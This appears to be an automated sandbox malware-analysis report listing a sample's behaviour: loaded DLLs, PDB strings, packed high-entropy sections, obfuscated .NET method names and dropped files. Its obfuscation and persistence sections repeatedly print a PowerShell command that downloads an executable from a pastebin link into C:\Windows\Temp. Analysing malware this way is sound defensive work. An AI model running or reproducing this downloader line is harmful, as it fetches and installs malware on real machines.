                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: SystemCoreHelper.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: SystemCoreHelper.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: %%.pdb source: mxtvcgq32fe.exe, 0000001E.00000002.2217512599.000000000098A000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: $dq7C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.pdb source: rundll32.exe, 0000000A.00000002.2603536788.0000000005031000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: zbjnkzvo4cc.exe, 00000018.00000002.2243599041.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: zbjnkzvo4cc.exe, 00000018.00000002.2243599041.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: $dq7C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.pdb source: rundll32.exe, 00000003.00000002.2634374806.00000000048E1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: n0C:\Windows\mscorlib.pdb source: zbjnkzvo4cc.exe, 00000018.00000002.2242896029.00000000008FA000.00000004.00000010.00020000.00000000.sdmp, mxtvcgq32fe.exe, 0000001E.00000002.2217512599.000000000098A000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\Temp\mxtvcgq32fe.PDB source: mxtvcgq32fe.exe, 0000001E.00000002.2217512599.000000000098A000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: zbjnkzvo4cc.exe, 00000018.00000002.2243599041.0000000000B7C000.00000004.00000020.00020000.00000000.sdmp, mxtvcgq32fe.exe, 0000001E.00000002.2217869048.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbKBQ source: mxtvcgq32fe.exe, 0000001E.00000002.2217869048.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbTAK source: mxtvcgq32fe.exe, 0000001E.00000002.2217869048.0000000000CEC000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\Temp\zbjnkzvo4cc.PDB source: zbjnkzvo4cc.exe, 00000018.00000002.2242896029.00000000008FA000.00000004.00000010.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline"Jump to behavior
                      Source: zbjnkzvo4cc.exe.17.drStatic PE information: section name: m@ka
                      Source: zbjnkzvo4cc.exe.17.drStatic PE information: section name:
                      Source: mxtvcgq32fe.exe.19.drStatic PE information: section name: m@ka
                      Source: mxtvcgq32fe.exe.19.drStatic PE information: section name:
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_036E6338 push eax; ret 8_2_036E6341
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_07D24EF3 push FFFFFF8Bh; retf 8_2_07D24EFC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_07D22EA2 push FFFFFF8Bh; iretd 8_2_07D22EAB
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_07D22E69 push FFFFFF8Bh; iretd 8_2_07D22E72
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_07D23D64 push FFFFFF8Bh; iretd 8_2_07D23D6D
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_07D214E4 push FFFFFF8Bh; iretd 8_2_07D214EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_04BE336A pushfd ; retf 17_2_04BE3379
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_04BE3350 pushad ; retf 17_2_04BE3369
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_0084338B pushfd ; retf 19_2_00843399
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C23EF8 pushfd ; iretd 24_2_68C23EFB
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeCode function: 24_2_68C2033B pushfd ; iretd 24_2_68C20346
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_3_0297FAB1 push eax; ret 26_3_0297FABA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_3_0297FAB1 push eax; ret 26_3_0297FABA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_3_0297F4A4 push 4402954Ah; retf 26_3_0297F4A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_3_0297F4A4 push 4402954Ah; retf 26_3_0297F4A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_3_0297F259 push ecx; iretd 26_3_0297F25A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_3_0297F259 push ecx; iretd 26_3_0297F25A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_3_0297FAB1 push eax; ret 26_3_0297FABA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_3_0297FAB1 push eax; ret 26_3_0297FABA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_3_0297F4A4 push 4402954Ah; retf 26_3_0297F4A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_3_0297F4A4 push 4402954Ah; retf 26_3_0297F4A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_3_0297F259 push ecx; iretd 26_3_0297F25A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 26_3_0297F259 push ecx; iretd 26_3_0297F25A
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_005474E2 push esi; iretd 30_2_005474E6
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_02817E40 push FFFFFFD9h; iretd 30_2_02817E44
                      Source: C:\Windows\Temp\mxtvcgq32fe.exeCode function: 30_2_02813B61 push esp; retf 30_2_02813B66
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_05272CE9 push 04B807E0h; retf 34_2_05272CEE
                      Source: zbjnkzvo4cc.exe.17.drStatic PE information: section name: m@ka entropy: 7.999658471887131
                      Source: mxtvcgq32fe.exe.19.drStatic PE information: section name: m@ka entropy: 7.999658471887131
                      Source: SystemCoreHelper.dll, JQAlCrJUDBBaZfiZASnKxQXAXPFvBTlZdUcCeDph.csHigh entropy of concatenated method names: 'kGcyCeKiODUqjjRSTanNLotKqCXecFUXCgzROyYT', 'zentMejlYv', 'PakToJqiXh', 'zANOrTWmfE', 'VZrlZtTOUI', 'PKqEXdmSdK', 'RXGxLZrycT', 'hWgtzQJZTU', 'PBnpsPjiRn', 'GeiuNXsTza'
                      Source: SystemCoreHelper.dll, FUGvnZDwPzUYomQWRJQLQqZSxzmgVfKWWXFiLdEc.csHigh entropy of concatenated method names: 'RLFUTqsHRiaMmOUoVNXNMxBJOXbqHHkOeOUfLfYg', 'EuYsUMQMZBCdYNzbFaCXescspyzJtvrWqenVmVsb', 'QowybiSLNSGpUNOwTITAyiZySDMWBwmuQSifhEjK', 'ogviFJNxZO', 'RsMEqRESZu', 'InAwwXOcuQ', 'sXZUIrQuul', 'TOigMDpLqu', 'NPVHlbGYLH', 'UKdjwTsSVZ'
                      Source: SystemCoreHelper.dll, fxGXYVQTdjJepCvWmrhZgFfiJXNdKaeubtHoHvLv.csHigh entropy of concatenated method names: 'fedkiegQTb', 'bBEnarvOOO', 'OftqUNNPls', 'bGTSquOQWP', 'weLbSBHDwD', 'SfREmZKMqu', 'rrFAZvHMXG', 'DFRZrKusys', 'fktIAWOpFq', 'JbzCyfylbx'

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')"Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\mxtvcgq32fe.exeJump to dropped file
                      Source: C:\Windows\Temp\zbjnkzvo4cc.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\zbjnkzvo4cc.exeJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\mxtvcgq32fe.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\zbjnkzvo4cc.exeJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
